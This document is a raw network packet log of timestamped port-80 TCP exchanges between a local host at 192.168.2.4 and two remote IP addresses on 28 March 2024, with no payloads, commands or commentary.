Mar 28, 2024 09:14:59.492928028 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.493410110 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.493426085 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.493477106 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.493477106 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.493480921 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.493495941 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.493525982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.493537903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.493560076 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.493563890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.493591070 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.493591070 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.493638039 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.494329929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.494362116 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.494384050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.494393110 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.494421959 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.494421959 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.494435072 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.494448900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.494483948 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.494503021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.494517088 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.494554043 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.494554043 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495235920 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.495287895 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495287895 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.495305061 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.495343924 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495347023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.495367050 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.495390892 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495390892 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495412111 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495424032 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.495450974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.495481968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495481968 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.495992899 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496094942 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.496165991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496190071 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496202946 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496211052 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.496247053 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496262074 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496298075 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.496300936 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496309042 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.496315956 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.496335030 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.496386051 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.496747017 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.496771097 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.496833086 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.496833086 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.497369051 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497411966 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497452021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497456074 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.497456074 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.497467041 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497505903 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.497505903 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.497518063 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497558117 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497571945 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497601986 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.497628927 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.497809887 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497853994 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.497869015 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.497900009 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.498001099 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498028040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498100042 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498114109 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.498115063 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498131037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498142958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498159885 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.498159885 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.498188019 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.498806000 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498851061 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.498965979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498980045 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.498995066 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.499007940 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.499025106 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.499054909 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.499068975 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.499088049 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.499104023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.499114990 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.499185085 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.499896049 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.499963045 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.499974966 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.500024080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.500042915 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.500083923 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.500103951 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.500108004 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.500138998 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.500154018 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.500179052 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.500226021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.500241995 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.500253916 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.500313997 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503251076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503268003 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503282070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503295898 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503307104 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503321886 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503339052 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503355980 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503355980 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503386021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503391981 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503420115 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503447056 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503462076 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.503490925 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503500938 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.503515959 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503515959 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.503528118 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503544092 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.503576040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503588915 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503597975 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503614902 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503644943 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503669024 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503788948 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503819942 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503850937 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503850937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503868103 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503892899 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503897905 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503932953 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.503932953 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503959894 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.503964901 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504004955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504004955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504005909 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504033089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504067898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504067898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504074097 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504100084 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504128933 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504132032 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.504167080 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504180908 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.504206896 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.504226923 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504240036 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504252911 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504256010 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.504273891 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504278898 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504316092 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504326105 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504326105 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504365921 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504369020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504410982 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504442930 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504456043 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504482031 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504487991 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504517078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504517078 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504525900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504551888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504584074 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504586935 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504609108 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504623890 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504664898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504664898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504734039 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504793882 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504796982 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504875898 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.504947901 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.504997015 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505109072 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505122900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505208969 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505208969 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505264997 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505278111 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505311966 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505312920 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505330086 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505354881 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505373955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505373955 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505392075 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505405903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505423069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505423069 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505448103 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.505481005 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.505481005 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.506167889 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506210089 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506225109 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506239891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506253958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506267071 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.506280899 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.506308079 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506321907 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506335020 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.506341934 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.506341934 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.506361961 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.507016897 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507066965 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507081032 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507117987 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.507132053 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.507209063 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507236958 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507287979 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507302046 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507313967 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507320881 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.507320881 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.507352114 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.507857084 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507951021 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507967949 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.507982969 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508018970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508018970 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508030891 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508045912 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508059025 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508071899 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508096933 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508101940 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508101940 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508111954 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508131027 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508234978 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508893967 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508913040 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.508955956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508955956 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.508974075 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509006023 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509032011 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509041071 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.509061098 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.509073973 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509113073 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509121895 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.509121895 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.509162903 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509196997 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.509196997 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.509248972 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509349108 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.509804964 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509861946 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.509999037 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510303974 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510351896 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510363102 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510379076 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510409117 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.510421991 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510435104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510435104 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510451078 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510474920 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.510498047 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510498047 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510519028 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510534048 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510559082 CET	80	49736	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.510603905 CET	49736	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.510621071 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510854959 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510870934 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510907888 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510922909 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510922909 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510937929 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510951996 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510962963 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510967016 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.510991096 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.510991096 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511009932 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511012077 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511024952 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511038065 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511056900 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511081934 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511609077 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511651993 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511673927 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511688948 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511703014 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511706114 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511737108 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511750937 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511755943 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511785030 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511790037 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511804104 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.511836052 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.511836052 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.512568951 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.512587070 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.512602091 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.512620926 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.512629032 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.512636900 CET	80	49743	104.21.22.54	192.168.2.4
Mar 28, 2024 09:14:59.512654066 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.512662888 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.512676954 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.512701988 CET	80	49735	5.42.66.22	192.168.2.4
Mar 28, 2024 09:14:59.512712002 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.512733936 CET	49743	80	192.168.2.4	104.21.22.54
Mar 28, 2024 09:14:59.512969971 CET	49735	80	192.168.2.4	5.42.66.22
Mar 28, 2024 09:14:59.513087034 CET	80	49743	104.21.22.54	192.168.2.4
